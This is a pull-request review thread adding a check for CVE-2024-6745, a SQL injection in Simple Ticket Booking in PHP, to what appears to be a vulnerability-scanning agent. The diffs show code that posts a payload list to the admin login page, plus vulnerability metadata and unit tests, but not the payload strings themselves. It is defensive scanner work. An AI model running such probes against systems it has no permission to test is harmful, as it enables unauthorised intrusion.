### PR TITLE
Add CVE-2024-6745

### PR DESCRIPTION
**Pull request by nmasdoufi-ol**

### CODE REVIEW

File: agent/exploits/cve_2024_6745.py [hunk 1]
```diff
@@ -0,0 +1,133 @@
...
+        try:
+            response = requests.post(
+                f"{target.origin}/adminauthenticate.php", timeout=DEFAULT_TIMEOUT
+            )
+            if (
+                response.status_code == 200
+                and "action ='adminauthenticate.php'" in response.text
+            ):
+                return True
+            return False
```
Comment (mohsinenar) [inline agent/exploits/cve_2024_6745.py:94]:
```suggestion
            return response.status_code == 200 and  "action ='adminauthenticate.php'" in response.text
```

File: agent/exploits/cve_2024_6745.py [hunk 2]
```diff
@@ -0,0 +1,133 @@
...
+
+    def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
+        """
+        Checks for SQL Injection vulnerability in Simple Ticket Booking In PHP.
+
+        Args:
+            target (definitions.Target): The target to check vulnerability for.
+
+        Returns:
+            list[definitions.Vulnerability]: List of vulnerabilities found (empty if none).
```
Comment (mohsinenar) [inline agent/exploits/cve_2024_6745.py:106]: No need to put types in docstring!

File: agent/exploits/cve_2024_6745.py [hunk 3]
```diff
@@ -0,0 +1,133 @@
...
+        """
+        vulnerabilities = []
+        try:
+            for payload in PAYLOADS:
```
Comment (mohsinenar) [inline agent/exploits/cve_2024_6745.py:110]: Wrapping the whole loop in try-catch means that if all the payloads worked and the last one failed, nothing will be reported!

File: agent/exploits/cve_2024_6745.py [hunk 4]
```diff
@@ -0,0 +1,133 @@
...
+                    timeout=DEFAULT_TIMEOUT,
+                )
+                if response.status_code == 200 and "Admin Sign In" in response.text:
+                    vulnerability = _create_vulnerability(target)
+                    vulnerabilities.append(vulnerability)
+            return vulnerabilities
+        except requests.RequestException:
+            return []
+
+    def exploit(self, target: definitions.Target) -> list[definitions.Vulnerability]:
```
Comment (mohsinenar) [inline agent/exploits/cve_2024_6745.py:123]: Why you added the method `exploit` if it's just calling `check`?

File: tests/exploits/cve_2024_6745_test.py [hunk 5]
```diff
@@ -0,0 +1,50 @@
...
+        "<br><br><center><table><tr><td>"
+        '<a href="adminindex.php"><button style="background-color:black; border-color:black">'
+        '<span style="color:white">Sign In ! &nbsp&nbspAgain</span></button></a>'
+        "</td></tr></table></center></body></html>",
+    )
+
+    exploit_instance = cve_2024_6745.SimpleTicketBookingSQLInjectionExploit()
+    target = definitions.Target("http", "example.com", 80)
+
+    assert not exploit_instance.accept(target), "The target should be reported as safe."
```
Comment (mohsinenar) [inline tests/exploits/cve_2024_6745_test.py:50]:
```suggestion
    assert exploit_instance.accept(target) is False, "The target should be reported as safe."
```

**Review by mohsinenar — DISMISSED** [review]

File: agent/exploits/cve_2024_6745.py (hunk 1 above)
Comment (3asm) [reply agent/exploits/cve_2024_6745.py:94]: I prefer the explicit ones, clearer expectation that the output is bool.

File: tests/exploits/cve_2024_6745_test.py [hunk 6]
```diff
@@ -0,0 +1,50 @@
...
+        "<input type='text' name='username'>"
+        "<input type='password' name='password'>"
+        "<input type='submit' value='Login'>"
+        "</form></body></html>",
+    )
+
+    exploit_instance = cve_2024_6745.SimpleTicketBookingSQLInjectionExploit()
+    target = definitions.Target("http", "example.com", 80)
+
+    assert exploit_instance.accept(
```
Comment (3asm) [inline tests/exploits/cve_2024_6745_test.py:28]: Why check not ran in the unit test?

**Review by 3asm — CHANGES_REQUESTED** [review]

File: agent/exploits/cve_2024_6745.py (hunk 3 above)
Comment (nmasdoufi-ol) [reply agent/exploits/cve_2024_6745.py:110]: My bad.

File: tests/exploits/cve_2024_6745_test.py (hunk 5 above)
Comment (oussamaessaji) [reply tests/exploits/cve_2024_6745_test.py:50]: please excplicit

File: agent/exploits/cve_2024_6745.py [hunk 7]
```diff
@@ -0,0 +1,119 @@
...
+            "Update the 'adminauthenticate.php' script to handle user inputs securely."
+        ),
+        security_issue=True,
+        privacy_issue=False,
+        has_public_exploit=False,
+        targeted_by_malware=False,
+        targeted_by_ransomware=False,
+        targeted_by_nation_state=False,
+    )
+    technical_detail = f"{target.origin}/adminauthenticate.php is vulnerable to {VULNERABILITY_REFERENCE}, {VULNERABILITY_TITLE}"
```
Comment (deadly-panda) [inline agent/exploits/cve_2024_6745.py:60]:
```suggestion
    technical_detail = f"{target.origin}/adminauthenticate.php is vulnerable to {VULNERABILITY_REFERENCE}: {VULNERABILITY_TITLE}"
```

File: agent/exploits/cve_2024_6745.py [hunk 8]
```diff
@@ -0,0 +1,119 @@
...
+            try:
+                response = requests.post(
+                    f"{target.origin}/adminauthenticate.php",
+                    data=payload,
+                    timeout=DEFAULT_TIMEOUT,
+                )
+                if (
+                    response.status_code == 200
+                    and "action ='adminauthenticate.php'" in response.text
+                ):
```
Comment (PiranhaSa) [inline agent/exploits/cve_2024_6745.py:114]: the same code for check and accept ? isn't this suppose to be 302 code

Comment (nmasdoufi-ol) [reply agent/exploits/cve_2024_6745.py:114]: yes but in the final page there should be a 200 OK and `action ='adminauthenticate.php'` in the response.

File: agent/exploits/cve_2024_6745.py (hunk 4 above)
Comment (nmasdoufi-ol) [reply agent/exploits/cve_2024_6745.py]: Removed.

File: tests/exploits/cve_2024_6745_test.py [hunk 9]
```diff
@@ -0,0 +1,65 @@
...
+    assert (
+        exploit_instance.accept(target) is True
+    ), "The target should be reported as vulnerable."
+
+    assert vulnerability.entry.title == "SQL Injection in Simple Ticket Booking"
+    assert (
+        vulnerability.technical_detail
+        == "http://example.com:80/adminauthenticate.php is vulnerable to CVE-2024-6745, SQL Injection in Simple "
+        "Ticket Booking"
+    )
```
Comment (3asm) [inline tests/exploits/cve_2024_6745_test.py:40]:
```suggestion
    vulnerabilities = exploit_instance.check(target)
    vulnerability = vulnerabilities[0]

    assert (
        exploit_instance.accept(target) is True
    ), "The target should be reported as vulnerable."

    assert vulnerability.entry.title == "SQL Injection in Simple Ticket Booking"
    assert (
        vulnerability.technical_detail
        == "http://example.com:80/adminauthenticate.php is vulnerable to CVE-2024-6745, SQL Injection in Simple "
        "Ticket Booking"
    )
```

It makes more sense to start with accept, assert on it. Then do check. Would even separate the test to test only thing at a time.

**Review by 3asm — CHANGES_REQUESTED** [review]

File: tests/exploits/cve_2024_6745_test.py (hunk 9 above)
Comment (nmasdoufi-ol) [reply tests/exploits/cve_2024_6745_test.py]: Done.

File: agent/exploits/cve_2024_6745.py [hunk 10]
```diff
@@ -0,0 +1,119 @@
...
+        """
+        vulnerabilities = []
+
+        for payload in PAYLOADS:
+            try:
+                response = requests.post(
+                    f"{target.origin}/adminauthenticate.php",
+                    data=payload,
+                    timeout=DEFAULT_TIMEOUT,
+                )
```
Comment (PiranhaSa) [inline agent/exploits/cve_2024_6745.py:110]: can you add allow_redirects=True to follow the edirection

File: agent/exploits/cve_2024_6745.py [hunk 11]
```diff
@@ -0,0 +1,119 @@
...
+        Returns:
+            bool: True if vulnerable, False otherwise.
+        """
+        try:
+            response = requests.post(
+                f"{target.origin}/adminauthenticate.php", timeout=DEFAULT_TIMEOUT
+            )
+            if (
+                response.status_code == 200
+                and "action ='adminauthenticate.php'" in response.text
```
Comment (PiranhaSa) [inline agent/exploits/cve_2024_6745.py:91]: no need ? 
```suggestion
                response.status_code == 200
                and "action ='adminauthenticate.php'" in response.text
```

File: agent/exploits/cve_2024_6745.py (hunk 10 above)
Comment (nmasdoufi-ol) [reply agent/exploits/cve_2024_6745.py]: Done.

**Review by 3asm — APPROVED** [review]

**Pull request merged**